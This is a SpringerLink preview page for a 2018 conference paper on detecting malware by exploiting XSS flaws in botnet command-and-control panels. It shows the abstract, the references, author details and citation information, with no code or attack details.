Skip to main content
SpringerLink
Log in

Detection in the Dark – Exploiting XSS Vulnerability in C&C Panels to Detect Malwares

  • Conference paper
  • First Online:
Cyber Security Cryptography and Machine Learning (CSCML 2018)

Part of the book series: Lecture Notes in Computer Science ((LNSC,volume 10879))

Abstract

Numerous defense techniques exist for preventing and detecting malware on end stations and servers (endpoints). Although these techniques are widely deployed on enterprise networks, many types of malware manage to stay under the radar, executing their malicious actions time and again. Therefore, a more creative and effective solution is necessary, especially as classic threat detection techniques do not utilize all stages of the attack kill chain in their attempt to detect malicious behavior on endpoints.

In this paper, we propose a novel approach for detecting malware. Our approach uses offensive and defensive techniques for detecting active malware attacks by exploiting the vulnerabilities of their command and control panels and manipulating significant values in the operating systems of endpoints – in order to attack these panels and utilize trusted communications between them and the infected machine.

This is a preview of subscription content, log in via an institution to check access.

Access this chapter

Log in via an institution
Chapter
USD 29.95
Price excludes VAT (USA)
  • Available as PDF
  • Read on any device
  • Instant download
  • Own it forever
eBook
USD 39.99
Price excludes VAT (USA)
  • Available as EPUB and PDF
  • Read on any device
  • Instant download
  • Own it forever
Softcover Book
USD 54.99
Price excludes VAT (USA)
  • Compact, lightweight edition
  • Dispatched in 3 to 5 business days
  • Free shipping worldwide - see info

Tax calculation will be finalised at checkout

Purchases are for personal use only

Institutional subscriptions

References

  1. Saeed, I., Selamat, A., Abuagoub, A., Abdulaziz, S.: A survey on malware and malware detection systems. Int. J. Comput. Appl. 67, 25–32 (2013). https://doi.org/10.5120/11480-7108

    Article  Google Scholar 

  2. Feily, M., Shahrestani, A., Ramadass, S.: A survey of botnet and botnet detection. In: Proceedings of 2009 3rd International Conference on Emerging Security Information, Systems and Technologies, SECURWARE 2009, pp. 268–273 (2009). https://doi.org/10.1109/securware.2009.48

  3. Cyber Kill Chain®. https://www.lockheedmartin.com/en-us/capabilities/cyber/cyber-kill-chain.html

  4. Cross-site Scripting (XSS) – OWASP. https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)

  5. Sood, A.K.: Exploiting fundamental weaknesses in botnet Command and Control (C & C) panels. Presented at the 2014 (2014)

    Google Scholar 

  6. Sood, A.K.: Malware at Stake: For Fun - XSS in ICE IX C&C Panel. https://secniche.blogspot.co.il/2012/06/for-fun-xss-in-ice-ix-bot-admin-panel.html

  7. Phase Bot – Exploiting C&C Panel | MalwareTech. https://www.malwaretech.com/2014/12/phase-bot-exploiting-c-pane.html

  8. Wallace, B.: A Study in Bots: Dexter. https://blog.cylance.com/a-study-in-bots-dexter-pos-botnet-malware

  9. Watkins, L., Silberberg, K., Morales, J.A., Robinson, W.H.: Using inherent command and control vulnerabilities to halt DDoS attacks. In: 2015 10th International Conference on Malicious Unwanted Software, MALWARE 2015, pp. 3–10 (2016). https://doi.org/10.1109/malware.2015.7413679

  10. Goodin, D.: White hats publish DDoS hijacking manual, turn tables on attackers | Ars Technica. https://arstechnica.com/information-technology/2012/08/ddos-take-down-manual/

  11. Goodin, D.: Zeus botnets’ Achilles’ Heel makes infiltration easy • The Register. http://www.theregister.co.uk/2010/09/27/zeus_botnet_hijacking

  12. Grange, W.: Digital Vengeance: Exploiting the Most Notorious C & C Toolkits Ethics of Hacking back (2017)

    Google Scholar 

  13. Geers, K., Czosseck, C.: The Virtual Battlefield: Perspectives on Cyber Warfare. Network Security. IOS Press, Amsterdam (2009). 305 pages

    Google Scholar 

  14. Dereszowski, A.: Targeted attacks: from being a victim to counter attacking, pp. 1–28 (2010)

    Google Scholar 

  15. Rascagnères, P.: Public document APT1: technical backstage malware analysis. General Information History, pp. 1–48 (2013)

    Google Scholar 

  16. Denbow, S., Hertz, J.: Pest control: taming the rats (2012)

    Google Scholar 

  17. Eisenbarth, M., Jones, J.: BladeRunner: adventures in tracking botnets. In: Botconf (2013)

    Google Scholar 

  18. Gundert, L.: Proactive Threat Identification Neutralizes Remote Access Trojan Efficacy (2015)

    Google Scholar 

  19. Singel, R.: Security Guru Gives Hackers a Taste of Their Own Medicine | WIRED. https://www.wired.com/2008/04/researcher-demo/

  20. Watkins, L., Kawka, C., Corbett, C., Robinson, W.H.: Fighting banking botnets by exploiting inherent command and control vulnerabilities. In: Proceedings of the 9th IEEE International Conference on Malicious Unwanted Software, MALCON 2014, pp. 93–100 (2014). https://doi.org/10.1109/malware.2014.6999411

  21. Application Verifier | Microsoft Docs. https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/application-verifier

  22. Kageyu, T.: MinHook - The Minimalistic x86/x64 API Hooking Library. https://www.codeproject.com/Articles/44326/MinHook-The-Minimalistic-x-x-API-Hooking-Libra

  23. Kovacs, E.: Alleged Author of MegalodonHTTP Malware Arrested | SecurityWeek.Com. https://www.securityweek.com/alleged-author-megalodonhttp-malware-arrested

  24. Dexter (malware). https://en.wikipedia.org/wiki/Dexter_(malware)

  25. Wallace, B.: A Study in Bots: DiamondFox. https://www.cylance.com/a-study-in-bots-diamondfox

  26. PHP: mysql_real_escape_string – Manual. http://php.net/manual/en/function.mysql-real-escape-string.php

  27. PHP: htmlentities – Manual. http://php.net/manual/en/function.htmlentities.php

  28. Top 10-2017 Top 10 – OWASP. https://www.owasp.org/index.php/Top_10-2017_Top_10

  29. Agmon, O., Posener, B.E., Schuster, A., Mu, A.: Ginseng: Market-Driven Memory Allocation

    Google Scholar 

  30. Sharfman, I., Schuster, A., Keren, D.: Shape sensitive geometric monitoring categories and subject descriptors. In: PODS (2008). https://doi.org/10.1145/1376916.1376958

  31. Friedman, A., Keren, D.: Privacy-preserving distributed stream monitoring. In: NDSS, pp. 23–26 (2014)

    Google Scholar 

  32. Ben-Yehuda, O.A., Ben-Yehuda, M., Schuster, A., Tsafrir, D.: The Resource-as-a-Service (RaaS) cloud. Commun. ACM 57, 76–84. https://doi.org/10.1145/2627422

  33. Gilburd, B., Schuster, A., Wolff, R.: k-TTP: a new privacy model for large-scale distributed environments. In: Proceedings of the Tenth ACM SIGKDD International Conference on Knowledge Discovery and Data Mining, pp. 563–568 (2004). https://doi.org/10.1145/1014052.1014120

  34. Schuster, A., Wolff, R., Gilburd, B.: Privacy-preserving association rule mining in large-scale distributed systems. In: Proceedings of Cluster Computing and Grid, pp. 1–8 (2004)

    Google Scholar 

  35. Verner, U., Schuster, A., Silberstein, M., Mendelson, A.: Scheduling processing of real-time data streams on heterogeneous multi-GPU systems. In: Proceedings of the 5th Annual International Systems and Storage Conference - SYSTOR 2012, pp. 1–12 (2012). https://doi.org/10.1145/2367589.2367596

Download references

Author information

Authors and Affiliations

  1. Technion – Israel Institute of Technology, 32000, Haifa, Israel

    Shay Nachum & Assaf Schuster

  2. Yezreel Valley College, 19300, Yezreel Valley, Israel

    Opher Etzion

Authors
  1. Shay Nachum
    View author publications

    You can also search for this author in PubMed Google Scholar

  2. Assaf Schuster
    View author publications

    You can also search for this author in PubMed Google Scholar

  3. Opher Etzion
    View author publications

    You can also search for this author in PubMed Google Scholar

Corresponding authors

Correspondence to Shay Nachum , Assaf Schuster or Opher Etzion .

Editor information

Editors and Affiliations

  1. Ben-Gurion University of the Negev, Beer Sheva, Israel

    Itai Dinur

  2. Ben-Gurion University of the Negev, Beer Sheva, Israel

    Shlomi Dolev

  3. Tata Consultancy Services (India), Chennai, Tamil Nadu, India

    Sachin Lodha

Rights and permissions

Reprints and permissions

Copyright information

© 2018 Springer International Publishing AG, part of Springer Nature

About this paper

Check for updates. Verify currency and authenticity via CrossMark

Cite this paper

Nachum, S., Schuster, A., Etzion, O. (2018). Detection in the Dark – Exploiting XSS Vulnerability in C&C Panels to Detect Malwares. In: Dinur, I., Dolev, S., Lodha, S. (eds) Cyber Security Cryptography and Machine Learning. CSCML 2018. Lecture Notes in Computer Science(), vol 10879. Springer, Cham. https://doi.org/10.1007/978-3-319-94147-9_18

Download citation

  • DOI: https://doi.org/10.1007/978-3-319-94147-9_18

  • Published:

  • Publisher Name: Springer, Cham

  • Print ISBN: 978-3-319-94146-2

  • Online ISBN: 978-3-319-94147-9

  • eBook Packages: Computer ScienceComputer Science (R0)

Publish with us

Policies and ethics

Search

Navigation